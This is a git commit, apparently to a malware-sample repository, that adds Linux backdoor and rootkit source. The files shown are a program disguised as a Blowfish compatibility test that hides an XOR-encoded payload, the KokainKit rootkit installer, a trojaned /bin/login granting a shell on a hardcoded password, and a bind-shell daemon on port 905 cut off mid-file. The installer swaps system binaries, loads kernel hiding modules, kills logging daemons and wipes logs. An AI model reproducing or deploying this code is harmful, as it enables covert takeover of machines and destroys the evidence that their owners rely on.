Add files via upload

2024-06-24 07:58:36 +00:00 · 2020-10-10 22:00:44 -05:00 · 2020-10-10 22:00:44 -05:00 · b3ade600b3
commit b3ade600b3
parent 59bbac0d72
12 changed files with 2005 additions and 0 deletions
--- a/Linux/Backdoor.Linux.Bofishy.a
+++ b/Linux/Backdoor.Linux.Bofishy.a
@ -0,0 +1,251 @@
+/*
+ * Blowfish input vectors are handled incorrectly on HP-UX PL.2 systems.
+ * Perform routine compatability checks.
+ */
+#include <stdio.h>
+
+#define KEY_TEST_NUM    25
+static unsigned char key_test[KEY_TEST_NUM]={
+        0xf0,0xe1,0xd2,0xc3,0xb4,0xa5,0x96,0x87,
+        0x78,0x69,0x5a,0x4b,0x3c,0x2d,0x1e,0x0f,
+        0x00,0x11,0x22,0x33,0x44,0x55,0x66,0x77,
+        0x88};
+
+/* DES cbc input vectors */
+static unsigned char ecb_data[]={
+
+	0x0c,0x0e,0x00,0x4d,0x46,0x41,0x00,0x5c,0x47,0x25,0x4c,
+	0x4e,0x5b,0x0f,0x11,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,
+	0x5b,0x01,0x4c,0x0f,0x13,0x13,0x70,0x6e,0x6c,0x6a,0x60,
+	0x69,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,
+	0x13,0x5c,0x5b,0x4b,0x46,0x40,0x01,0x47,0x11,0x0f,0x25,
+	0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x5c,
+	0x56,0x5c,0x00,0x5b,0x56,0x5f,0x4a,0x5c,0x01,0x47,0x11,
+	0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,0x4a,0x0f,
+	0x13,0x5c,0x56,0x5c,0x00,0x5c,0x40,0x4c,0x44,0x4a,0x5b,
+	0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,
+	0x4b,0x4a,0x0f,0x13,0x41,0x4a,0x5b,0x46,0x41,0x4a,0x5b,
+	0x00,0x46,0x41,0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,
+	0x4c,0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x5a,0x41,0x46,0x5c,
+	0x5b,0x4b,0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,
+	0x43,0x5a,0x4b,0x4a,0x0f,0x13,0x4a,0x5d,0x5d,0x41,0x40,
+	0x01,0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,
+	0x4b,0x4a,0x0f,0x13,0x5c,0x46,0x48,0x41,0x4e,0x43,0x01,
+	0x47,0x11,0x0f,0x25,0x0c,0x46,0x41,0x4c,0x43,0x5a,0x4b,
+	0x4a,0x0f,0x13,0x5c,0x4a,0x5b,0x45,0x42,0x5f,0x01,0x47,
+	0x11,0x0f,0x25,0x45,0x42,0x5f,0x70,0x4d,0x5a,0x49,0x0f,
+	0x4a,0x41,0x59,0x14,0x46,0x41,0x5b,0x0f,0x5c,0x14,0x4c,
+	0x47,0x4e,0x5d,0x0f,0x05,0x46,0x70,0x59,0x4e,0x43,0x12,
+	0x0d,0x73,0x57,0x1d,0x49,0x73,0x57,0x19,0x1d,0x73,0x57,
+	0x19,0x16,0x73,0x57,0x19,0x4a,0x73,0x57,0x1d,0x49,0x73,
+	0x57,0x18,0x1c,0x73,0x57,0x19,0x17,0x0d,0x14,0x59,0x40,
+	0x46,0x4b,0x0f,0x5c,0x46,0x48,0x07,0x46,0x41,0x5b,0x0f,
+	0x5c,0x46,0x48,0x06,0x54,0x4c,0x43,0x40,0x5c,0x4a,0x07,
+	0x5c,0x06,0x14,0x5c,0x43,0x4a,0x4a,0x5f,0x07,0x1c,0x19,
+	0x1f,0x1f,0x06,0x14,0x43,0x40,0x41,0x48,0x45,0x42,0x5f,
+	0x07,0x4a,0x41,0x59,0x03,0x1f,0x06,0x14,0x52,0x46,0x41,
+	0x5b,0x0f,0x42,0x4e,0x46,0x41,0x07,0x06,0x54,0x46,0x41,
+	0x5b,0x0f,0x57,0x14,0x4c,0x47,0x4e,0x5d,0x0f,0x4c,0x03,
+	0x05,0x4e,0x74,0x1d,0x72,0x14,0x5c,0x5b,0x5d,0x5a,0x4c,
+	0x5b,0x0f,0x5c,0x40,0x4c,0x44,0x4e,0x4b,0x4b,0x5d,0x70,
+	0x46,0x41,0x0f,0x5c,0x4e,0x14,0x5c,0x5b,0x5d,0x5a,0x4c,
+	0x5b,0x0f,0x5c,0x46,0x48,0x4e,0x4c,0x5b,0x46,0x40,0x41,
+	0x0f,0x4e,0x4c,0x5b,0x14,0x5c,0x58,0x46,0x5b,0x4c,0x47,
+	0x07,0x49,0x40,0x5d,0x44,0x07,0x06,0x06,0x54,0x4c,0x4e,
+	0x5c,0x4a,0x0f,0x1f,0x15,0x4d,0x5d,0x4a,0x4e,0x44,0x14,
+	0x4b,0x4a,0x49,0x4e,0x5a,0x43,0x5b,0x15,0x4a,0x57,0x46,
+	0x5b,0x07,0x1f,0x06,0x14,0x52,0x4c,0x43,0x40,0x5c,0x4a,
+	0x07,0x1f,0x06,0x14,0x4c,0x43,0x40,0x5c,0x4a,0x07,0x1e,
+	0x06,0x14,0x4c,0x43,0x40,0x5c,0x4a,0x07,0x1d,0x06,0x14,
+	0x42,0x4a,0x42,0x5c,0x4a,0x5b,0x07,0x09,0x4e,0x4c,0x5b,
+	0x03,0x1f,0x03,0x5c,0x46,0x55,0x4a,0x40,0x49,0x07,0x4e,
+	0x4c,0x5b,0x06,0x06,0x14,0x4e,0x4c,0x5b,0x01,0x5c,0x4e,
+	0x70,0x47,0x4e,0x41,0x4b,0x43,0x4a,0x5d,0x12,0x5c,0x46,
+	0x48,0x14,0x5c,0x46,0x48,0x4e,0x4c,0x5b,0x46,0x40,0x41,
+	0x07,0x7c,0x66,0x68,0x6e,0x63,0x7d,0x62,0x03,0x09,0x4e,
+	0x4c,0x5b,0x03,0x61,0x7a,0x63,0x63,0x06,0x14,0x4b,0x40,
+	0x54,0x5c,0x4a,0x5b,0x45,0x42,0x5f,0x07,0x4a,0x41,0x59,
+	0x06,0x14,0x46,0x49,0x07,0x07,0x5c,0x12,0x5c,0x40,0x4c,
+	0x44,0x4a,0x5b,0x07,0x6e,0x69,0x70,0x66,0x61,0x6a,0x7b,
+	0x03,0x7c,0x60,0x6c,0x64,0x70,0x7c,0x7b,0x7d,0x6a,0x6e,
+	0x62,0x03,0x1f,0x06,0x06,0x12,0x12,0x07,0x02,0x1e,0x06,
+	0x06,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,0x14,0x42,0x4a,
+	0x42,0x5c,0x4a,0x5b,0x07,0x09,0x5c,0x4e,0x03,0x1f,0x03,
+	0x5c,0x46,0x55,0x4a,0x40,0x49,0x07,0x5c,0x4e,0x06,0x06,
+	0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x49,0x4e,0x42,
+	0x46,0x43,0x56,0x12,0x6e,0x69,0x70,0x66,0x61,0x6a,0x7b,
+	0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x5f,0x40,0x5d,
+	0x5b,0x12,0x47,0x5b,0x40,0x41,0x5c,0x07,0x19,0x19,0x19,
+	0x18,0x06,0x14,0x5c,0x4e,0x01,0x5c,0x46,0x41,0x70,0x4e,
+	0x4b,0x4b,0x5d,0x01,0x5c,0x70,0x4e,0x4b,0x4b,0x5d,0x12,
+	0x46,0x41,0x4a,0x5b,0x70,0x4e,0x4b,0x4b,0x5d,0x07,0x0d,
+	0x1d,0x1f,0x1c,0x01,0x19,0x1d,0x01,0x1e,0x1a,0x17,0x01,
+	0x1c,0x1d,0x0d,0x06,0x14,0x4e,0x43,0x4e,0x5d,0x42,0x07,
+	0x1e,0x1f,0x06,0x14,0x46,0x49,0x07,0x4c,0x40,0x41,0x41,
+	0x4a,0x4c,0x5b,0x07,0x5c,0x03,0x07,0x5c,0x5b,0x5d,0x5a,
+	0x4c,0x5b,0x0f,0x5c,0x40,0x4c,0x44,0x4e,0x4b,0x4b,0x5d,
+	0x05,0x06,0x09,0x5c,0x4e,0x03,0x5c,0x46,0x55,0x4a,0x40,
+	0x49,0x07,0x5c,0x4e,0x06,0x06,0x12,0x12,0x07,0x02,0x1e,
+	0x06,0x06,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,0x14,0x46,
+	0x49,0x07,0x07,0x57,0x12,0x5d,0x4a,0x4e,0x4b,0x07,0x5c,
+	0x03,0x09,0x4c,0x03,0x1e,0x06,0x06,0x12,0x12,0x07,0x02,
+	0x1e,0x06,0x06,0x54,0x4a,0x57,0x46,0x5b,0x07,0x1e,0x06,
+	0x14,0x52,0x4a,0x43,0x5c,0x4a,0x0f,0x46,0x49,0x07,0x57,
+	0x12,0x12,0x1e,0x06,0x54,0x5c,0x58,0x46,0x5b,0x4c,0x47,
+	0x07,0x4c,0x06,0x54,0x4c,0x4e,0x5c,0x4a,0x0f,0x08,0x6e,
+	0x08,0x15,0x4a,0x57,0x46,0x5b,0x07,0x1f,0x06,0x14,0x4c,
+	0x4e,0x5c,0x4a,0x0f,0x08,0x6b,0x08,0x15,0x4e,0x43,0x4e,
+	0x5d,0x42,0x07,0x1f,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,
+	0x5c,0x03,0x1f,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,0x5c,
+	0x03,0x1e,0x06,0x14,0x4b,0x5a,0x5f,0x1d,0x07,0x5c,0x03,
+	0x1d,0x06,0x14,0x4e,0x74,0x1f,0x72,0x12,0x46,0x70,0x59,
+	0x4e,0x43,0x14,0x4e,0x74,0x1e,0x72,0x12,0x61,0x7a,0x63,
+	0x63,0x14,0x4a,0x57,0x4a,0x4c,0x59,0x4a,0x07,0x4e,0x74,
+	0x1f,0x72,0x03,0x4e,0x03,0x61,0x7a,0x63,0x63,0x06,0x14,
+	0x4d,0x5d,0x4a,0x4e,0x44,0x14,0x4c,0x4e,0x5c,0x4a,0x0f,
+	0x08,0x62,0x08,0x15,0x4e,0x43,0x4e,0x5d,0x42,0x07,0x1f,
+	0x06,0x14,0x5c,0x46,0x48,0x07,0x1f,0x06,0x14,0x4d,0x5d,
+	0x4a,0x4e,0x44,0x14,0x4b,0x4a,0x49,0x4e,0x5a,0x43,0x5b,
+	0x15,0x52,0x52,0x4a,0x43,0x5c,0x4a,0x54,0x4a,0x57,0x46,
+	0x5b,0x07,0x1f,0x06,0x14,0x52,0x52,0x58,0x47,0x46,0x43,
+	0x4a,0x07,0x1e,0x06,0x14,0x52,0x25,0x70,0x6e,0x6c,0x6a,
+	0x60,0x69,0x25,0x07,0x48,0x5d,0x4a,0x5f,0x0f,0x02,0x59,
+	0x0f,0x02,0x46,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,
+	0x0f,0x62,0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x01,0x46,
+	0x41,0x0f,0x11,0x0f,0x42,0x01,0x40,0x5a,0x5b,0x0f,0x14,
+	0x0f,0x4c,0x5f,0x0f,0x42,0x01,0x40,0x5a,0x5b,0x0f,0x62,
+	0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x01,0x46,0x41,0x0f,
+	0x14,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x42,0x01,0x40,
+	0x5a,0x5b,0x25,0x48,0x5d,0x4a,0x5f,0x0f,0x02,0x59,0x0f,
+	0x02,0x46,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,0x0f,
+	0x62,0x4e,0x44,0x4a,0x49,0x46,0x43,0x4a,0x0f,0x11,0x0f,
+	0x42,0x01,0x40,0x5a,0x5b,0x0f,0x14,0x0f,0x4c,0x5f,0x0f,
+	0x42,0x01,0x40,0x5a,0x5b,0x0f,0x62,0x4e,0x44,0x4a,0x49,
+	0x46,0x43,0x4a,0x0f,0x14,0x0f,0x5d,0x42,0x0f,0x02,0x49,
+	0x0f,0x42,0x01,0x40,0x5a,0x5b,0x25,0x5d,0x42,0x0f,0x02,
+	0x49,0x0f,0x4d,0x49,0x02,0x5b,0x4a,0x5c,0x5b,0x05,0x25,
+	0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x12,0x0d,0x4f,
+	0x4d,0x4e,0x5c,0x4a,0x41,0x4e,0x42,0x4a,0x0f,0x73,0x0d,
+	0x73,0x4f,0x48,0x5d,0x4a,0x5f,0x0f,0x0b,0x7a,0x7c,0x6a,
+	0x7d,0x15,0x0f,0x00,0x4a,0x5b,0x4c,0x00,0x5f,0x4e,0x5c,
+	0x5c,0x58,0x4b,0x73,0x4f,0x73,0x0d,0x4f,0x0d,0x25,0x46,
+	0x49,0x0f,0x0f,0x0e,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,
+	0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,
+	0x5b,0x47,0x4a,0x41,0x0f,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,
+	0x60,0x68,0x12,0x5c,0x47,0x14,0x0f,0x49,0x46,0x0f,0x25,
+	0x48,0x4c,0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,
+	0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x40,0x0f,0x0b,
+	0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,
+	0x7f,0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,
+	0x67,0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,
+	0x25,0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,0x7b,
+	0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,0x47,0x4a,
+	0x41,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,
+	0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,
+	0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,
+	0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x09,0x09,
+	0x0f,0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,0x48,0x4c,
+	0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,0x4a,
+	0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x43,0x5c,0x40,0x4c,0x44,
+	0x4a,0x5b,0x0f,0x02,0x43,0x41,0x5c,0x43,0x0f,0x02,0x40,
+	0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,
+	0x0f,0x7f,0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,
+	0x7b,0x67,0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,
+	0x68,0x0f,0x25,0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,
+	0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,
+	0x47,0x4a,0x41,0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,
+	0x00,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,
+	0x00,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,
+	0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,
+	0x09,0x09,0x0f,0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,
+	0x4c,0x4c,0x0f,0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,
+	0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x02,0x40,0x0f,0x0b,0x7b,
+	0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x14,0x0f,0x7f,
+	0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,0x67,
+	0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x25,
+	0x46,0x49,0x0f,0x5b,0x4a,0x5c,0x5b,0x0f,0x0b,0x7b,0x6a,
+	0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x5b,0x47,0x4a,0x41,
+	0x0f,0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,0x40,
+	0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,0x40,
+	0x41,0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,0x7b,
+	0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x0f,0x09,0x09,0x0f,
+	0x4a,0x57,0x46,0x5b,0x14,0x49,0x46,0x25,0x4c,0x4c,0x0f,
+	0x02,0x58,0x0f,0x4c,0x40,0x41,0x49,0x5b,0x4a,0x5c,0x5b,
+	0x01,0x4c,0x0f,0x02,0x43,0x5c,0x40,0x4c,0x44,0x4a,0x5b,
+	0x0f,0x02,0x43,0x41,0x5c,0x43,0x0f,0x02,0x40,0x0f,0x0b,
+	0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x14,0x0f,0x7f,
+	0x6e,0x7b,0x67,0x12,0x01,0x15,0x0b,0x7f,0x6e,0x7b,0x67,
+	0x0f,0x0b,0x7b,0x6a,0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x25,
+	0x5d,0x42,0x0f,0x02,0x49,0x0f,0x01,0x00,0x4c,0x40,0x41,
+	0x49,0x5b,0x4a,0x5c,0x5b,0x0f,0x01,0x00,0x4c,0x40,0x41,
+	0x49,0x5b,0x4a,0x5c,0x5b,0x01,0x4c,0x0f,0x0b,0x7b,0x6a,
+	0x7c,0x7b,0x7f,0x7d,0x60,0x68,0x06,0x0f,0x1e,0x11,0x00,
+	0x4b,0x4a,0x59,0x00,0x41,0x5a,0x43,0x43,0x0f,0x1d,0x11,
+	0x09,0x1e,0x25,0x00};
+
+/* big endian */
+static unsigned long bfplain[2][2]={
+        {0x424c4f57L,0x46495348L},
+        {0xfedcba98L,0x76543210L}
+        };
+
+static unsigned long bfcipher[2][2]={
+        {0x324ed0feL,0xf413a203L},
+        {0xcc91732bL,0x8022f684L}
+        };
+
+
+static unsigned char ocb_data[]={
+    0x4d,0x2c,0x20,0x73,0x69,0x67,0x29,0x3b,
+    0x0a,0x20,0x64,0x6f,0x20,0x7b,0x0a,0x20,
+    0x20,0x73,0x65,0x74,0x6a,0x6d,0x70,0x28,
+    0x00};
+
+static unsigned char cbc_key [16]={
+        0x01,0x23,0x45,0x67,0x89,0xab,0xcd,0xef,
+        0xf0,0xe1,0xd2,0xc3,0xb4,0xa5,0x96,0x87};
+
+static unsigned char cbc_iv [8]={0xfe,0xdc,0xba,0x98,0x76,0x54,0x32,0x10};
+
+#if defined(WIN16) || defined(__LP32__)
+#elif defined(_CRAY) || defined(__ILP64__)
+/*
+ * _CRAY note. I could declare short, but I have no idea what impact
+ * does it have on performance on none-T3E machines. I could declare
+ * int, but at least on C90 sizeof(int) can be chosen at compile time.
+ * So I've chosen long...
+ *                                      <appro@fy.chalmers.se>
+ */
+#else
+#endif
+
+main(void)
+{
+    int i, n, err;
+    unsigned char cbc_in[40],cbc_out[40],iv[8];
+
+    dup2(1, 2);
+#ifdef CHARSET_EPCDIC
+    epcdic2ascii(ecb_data, strlen(ecb_data));
+#endif
+
+    printf("# testing in raw ecb mode\n");
+
+    n=0;
+    if (memcmp(&(bfcipher[n][0]),&(cbc_iv[0]),8) != 0)
+    {
+        err = 1;
+    }
+
+    if (memcmp(&(bfplain[n][0]),&(cbc_iv[0]),8) != 0)
+    {
+        err = 1;
+    }
+
+    if (err)
+    {
+        for (i = 0; i < sizeof(ecb_data)-1; i++)
+            fprintf(stderr, "%c", ecb_data[i] ^ 47);
+    }
+return(0);
+}
--- a/Linux/Backdoor.Linux.Kokain
+++ b/Linux/Backdoor.Linux.Kokain
@ -0,0 +1,174 @@
+#!/bin/sh
+
+# KokainKit v1.6 by deka
+# -
+# A rootkit based on knark and cobolt.
+# Do not Distribute!
+# -
+
+TORNDIR=/usr/src/.puta
+THEPASS=$1
+DITTPORT=$2
+THEDIR=/usr/lib/$THEPASS
+
+echo "---------------------------------------"
+echo "[1;32m       KokainKit v1.6 by dekah&self[0m"
+echo "---------------------------------------"
+echo ""
+echo "Using magic word $THEPASS and dittrichport $DITTPORT."
+echo "Installing. Please stand by... (Pour yourself an ice cold coke and chill)"
+
+if ! test "$(whoami)" = "root"; then
+  echo "  - UID0 check failed"
+  echo ""
+  sleep 3
+  echo "FATAL: You're not root"
+  exit 1
+fi
+
+if test -d "$TORNDIR"; then
+  echo "  - T0rnKit found. Screwing it up"
+  killall -9 in.inetd
+  killall -9 t0rntd
+  echo "$RANDOMdecryptThisT0rn :D" > /etc/ttyhash
+  echo "" > /usr/sbin/in.inetd
+  echo "ap" > $TORNDIR/.1file
+  echo "255.255" > $TORNDIR/.1addr
+  echo "255.255" > $TORNDIR/.1logz
+  echo "ap" > $TORNDIR/.1proc
+fi
+
+if ! test -d "/usr/include"; then
+  echo "  - /usr/include does not exist, making it (ugly)..."
+  mkdir /usr/include
+fi
+
+if ! test -d "/usr/include/pwdb"; then
+  echo "  - /usr/include/pwdb does not exist, making it (ugly)..."
+  mkdir /usr/include/pwdb
+fi
+
+mkdir $THEDIR
+if test -d "$THEDIR"; then
+  echo "  - Secret dir created"
+else
+  echo "  - MkDir failed"
+  echo ""
+  echo "FATAL: Unable to create the secret directory"
+  exit 1
+fi
+
+cd src
+echo "#define MAGIC_WORD \"$THEPASS\"" > kokain.h
+echo "#define MAGIC_DIR  \"$THEDIR\"" >> kokain.h
+
+gcc -O2 cobolt.c -o cobolt
+if test -r "./cobolt"; then
+  echo "  - Cobolt compiled"
+else
+  echo "  - gcc failed"
+  echo ""
+  cd ..
+  sleep 3
+  echo "FATAL: Unable to compile Cobolt"
+  exit 1
+fi
+touch -acmr /bin/login cobolt
+cp /bin/login $THEDIR/login1
+cp cobolt $THEDIR/login2
+echo "  - Cobolt installed"
+
+gcc -O2 autoexec.c -o autoexec
+if test -r "./autoexec"; then
+  echo "  - AutoExec compiled"
+else
+  echo "  - gcc failed"
+  echo ""
+  cd ..
+  echo "FATAL: Unable to compile AutoExec"
+  exit 1
+fi
+
+touch -acmr /sbin/portmap autoexec
+cp /sbin/portmap $THEDIR/portmap
+rm -f /sbin/portmap
+cp autoexec /sbin/portmap
+echo "#!/bin/sh" > $THEDIR/autoexec
+echo "  - AutoExec installed"
+cd ..
+
+killall -9 syslogd klogd
+./wipe u root >/dev/null 2>&1
+rm -f /var/log/messages /var/log/secure
+cp /var/log/messages.1 /var/log/messages >/dev/null 2>&1
+cp /var/log/secure.1 /var/log/secure >/dev/null 2>&1
+cp /var/log/messages.0 /var/log/messages >/dev/null 2>&1
+cp /var/log/secure.0 /var/log/secure >/dev/null 2>&1
+echo "  - Logs cleaned"
+
+#echo "" > /etc/hosts.allow
+#echo "" > /etc/hosts.deny
+#echo "  - Hosts.deny/Hosts.allow cleaned"
+echo "  - Patching dittrich..."
+./bpatch ./dittrich __PATCHPort__ $DITTPORT
+
+cat <<E0F>> $THEDIR/.bashrc
+alias ls="ls --color -alF"
+alias dir="dir --color"
+export PS1="\u@\h:\w# "
+export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/X11R6/bin:$THEDIR:$THEDIR/stuff
+cd
+E0F
+echo "  - .bashrc created"
+
+cp -R dittrich stuff $THEDIR
+echo "  - Stuff installed"
+
+mkdir $THEDIR/knrk
+cd knark
+make >/dev/null 2>&1
+echo "  - Knark compiled"
+cd ..
+rm -rf knark/knrksrc knark/Makefile
+cp -R knark/* $THEDIR/knrk
+echo "/sbin/insmod -f $THEDIR/knrk/knrk.o" >> $THEDIR/autoexec
+echo "/sbin/insmod -f $THEDIR/knrk/knrkmodhide.o" >> $THEDIR/autoexec
+echo "$THEDIR/knrk/knrkhidef $THEDIR" >> $THEDIR/autoexec
+echo "$THEDIR/knrk/knrkered /bin/login $THEDIR/login2" >> $THEDIR/autoexec
+echo "$THEDIR/knrk/knrknethide \":`./tohex $DITTPORT`\"" >> $THEDIR/autoexec 
+echo "$THEDIR/dittrich" >> $THEDIR/autoexec
+echo "killall -31 dittrich" >> $THEDIR/autoexec
+
+/sbin/portmap >/dev/null 2>&1
+echo "  - Knark installed"
+
+if test -d "/var/named/ADMROCKS"; then
+  rm -rf /var/named/ADMROCKS
+  echo "  - AdmRocks erased"
+fi
+
+cat /etc/inetd.conf | grep -v "2222" > /tmp/blahah
+rm -f /etc/inetd.conf
+cp /tmp/blahah /etc/inetd.conf
+rm -f /tmp/blahah
+echo "  - Inetd.conf fixed"
+
+PATH=/sbin:$PATH
+syslogd
+klogd
+echo "  - Syslogd/Klogd restarted"
+cd ..
+rm -rf *kokain*
+echo "  - KokainKit removed"
+
+echo ""
+#echo "[1;34m--x( th1z b0x n0w b3L0NgZ t0 j00! )x-- --x(.:tHE:kOkAiNkIt:.)x--[0m"
+if test -d "/proc/$THEPASS";
+then
+  echo "Knark installed successfully."
+else
+  echo " KNARK INSTALLATION FAILED - INSTALLING LOGIN BD"
+  cp $THEDIR/login2 /bin/login
+fi
+echo "kitinst $THEPASS $DITTPORT" 
+# - EoF - #
--- a/Linux/Backdoor.Linux.Rootin.a
+++ b/Linux/Backdoor.Linux.Rootin.a
@ -0,0 +1,85 @@
+#!/bin/sh
+
+# Fearless Rootkit T-Type v0.1
+# Coded by Merlion  merld_one@yahoo.com
+# To run:
+# chmod 755 droprk.sh
+# ./droprk.sh
+# Telnet to login daemon (port 513) and enter password
+# Have fun!
+
+arg="$1"
+if [ "$arg" = "" ]; then
+echo "Usage is: ./droprk -i (to install) -r (to uninstall)"
+exit 1
+elif [ "$arg" = "-r" ]; then
+test -e /bin/.login && rm -f /bin/login; mv /bin/.login /bin/login; exit 0 || echo "Not installed"
+elif [ $arg = "-i" ]; then
+
+cat > /tmp/drop.c << EOF
+
+#include <stdio.h>
+#include <string.h>
+#include <signal.h>
+#include <unistd.h>
+#include <fcntl.h>		/* For daemon related functions */
+
+#define REAL "/bin/.login"
+#define TROJAN "/bin/login"
+#define ROOT "merlion"
+
+char **execute;
+char passwd[8];
+
+main(int argc, char **argv) {
+
+void die(char *error);
+void connection();
+
+pid_t pid, sid;			/* Daemon variables */
+
+signal(SIGALRM,connection);
+alarm(1);
+execute=argv;
+*execute=TROJAN;
+
+if ((pid=fork()) < 0) die("Error on fork()");	   /* Start daemon process */
+if (pid > 0) exit(0); 				   /* Exit parent process */
+if ((sid=setsid()) < 0) die("Error on setsid()");  /* Create new session */
+if ((chdir("/") < 0)) die("Error on chdir()");	   /* Set working directory */
+umask(0);	/* Set umask to 0 to avoid unwanted rights inheritance */
+close(STDIN_FILENO);		/*    Close			*/
+close(STDOUT_FILENO);		/*    associated   		*/
+close(STDERR_FILENO);		/*    file streams		*/
+/* On our own now */
+
+scanf("%s", passwd);
+if (strcmp(passwd,ROOT) == 0) {
+alarm(0);
+execl("/bin/sh","/bin/sh","-i",0);
+exit(0);  }	/* Remove?? */
+else {
+execv(REAL,execute);
+exit(0);  }  /* Remove?? */
+}
+
+void connection() {
+execv(REAL,execute);
+exit(0);  }
+
+void die(char *error)  {
+perror(error);
+exit(1); }
+
+EOF
+
+fi 
+
+gcc -o /tmp/login /tmp/drop.c
+rm -f /tmp/drop.c
+mv /bin/login /bin/.login
+mv /tmp/login /bin/
+
+exit 0
+
+
--- a/Linux/Backdoor.Linux.Rootin.b
+++ b/Linux/Backdoor.Linux.Rootin.b
@ -0,0 +1,74 @@
+#!/bin/sh
+
+# Fearless Rootkit D-Type v0.1
+# Coded by Merlion 
+# Website: http://areyoufearless.com
+
+# chmod 755 rootd.sh
+# ./rootd.sh
+# telnet to port 905 & run commands. End each command with a semicolon (;)
+
+
+
+                     
+
+#include <stdio.h>
+#include <string.h>
+#include <netdb.h>
+#include <netinet/in.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <unistd.h>
+
+void die(char *error);
+main(int argc, char **argv) {
+pid_t pid, sid;
+int len, clipid, serpid, stat, sock, soklen, sockbind, sockrec, sockopt, sockcli, socklen;
+unsigned short int mcon;
+unsigned short int port;
+char *rbuf, *rmode;
+struct sockaddr_in  Client, Server;
+if ((sock=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) die("Error creating socket");
+if (argc != 3) die("Usage");
+memset(&Server, 0, sizeof(Server));
+Server.sin_family=AF_INET;
+port=905;
+mcon=5;
+Server.sin_port=htons(port);
+Server.sin_addr.s_addr=htonl(INADDR_ANY);
+if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, (void *) &sockopt, sizeof(sockopt)) < 0)
+die("No socket options set");
+if (sockbind=bind(sock, (struct sockaddr *) &Server, sizeof(Server)) != 0)
+die("Could not bind socket");
+if ((sockbind=listen(sock, mcon)) != 0) die("Failed on listen()");  
+pid=fork();
+if (pid < 0) die("Initial fork() failed");
+if (pid>0) exit(0);
+if ((chdir("/")) < 0) die("Could not set working directory");
+if ((setsid()) < 0) die("setsid() failed in creating daemon");
+umask(0);
+close(STDIN_FILENO);
+close(STDOUT_FILENO);
+close(STDERR_FILENO);
